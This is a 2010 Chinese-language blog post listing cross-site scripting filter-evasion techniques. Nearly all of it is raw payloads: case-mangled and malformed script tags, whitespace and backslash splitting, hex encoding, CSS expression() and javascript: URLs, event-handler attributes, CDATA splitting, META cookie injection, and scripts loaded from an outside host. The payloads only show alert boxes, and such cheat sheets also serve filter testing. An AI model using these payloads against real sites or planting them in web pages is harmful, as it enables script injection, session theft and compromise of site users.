2010年1月18日 星期一

Cross Site Scripting(XSS)攻擊手法介紹

1. 改變字元大小寫
    <sCript>alert('d')</scRipT>

2. 利用多加一些其它字元來規避Regular Expression的檢查
    <<script>alert('c')//<</script>
    <SCRIPT a=">" SRC="t.js"></SCRIPT>
    <SCRIPT =">" SRC="t.js"></SCRIPT>
    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>
    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>
    <SCRIPT a=`>` SRC="t.js"></SCRIPT>
    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. 以其它副檔名取代.js
    <script src="bad.jpg"></script>

4. 將Javascript寫在CSS檔裡
    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
       example:
          body {
               background-image: url('javascript:alert("XSS");')
          }

5. 在script的tag裡加入一些其它字元
    <SCRIPT/SRC="t.js"></SCRIPT>
    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. 使用tab或是new line來規避
    <img src="jav ascr ipt:alert('XSS3')">
    <img src="jav ascr ipt:alert('XSS3')">
    <IMG SRC="jav ascript:alert('XSS');">
         -> tag
         -> new line

7. 使用"\"來規避
    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>


8. 使用Hex encode來規避(也可能會把";"拿掉)
    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
        原始碼:<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
        原始碼:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">


9. script in HTML tag
    <body onload=」alert('onload')」>
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload


10. 在swf裡含有xss的code
    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. 利用CDATA將xss的code拆開,再組合起來。
    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>


12. 利用HTML+TIME。
    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>


13. 透過META寫入Cookie。
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src , href , url
    <IFRAME SRC=javascript:alert('13')></IFRAME>
    <img src="javascript:alert('XSS3')">
    <IMG DYNSRC="javascript:alert('XSS20')">
    <IMG LOWSRC="javascript:alert('XSS21')">
    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>
    <TABLE BACKGROUND="javascript:alert('XSS29')">
    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">
    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>
    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

沒有留言:

張貼留言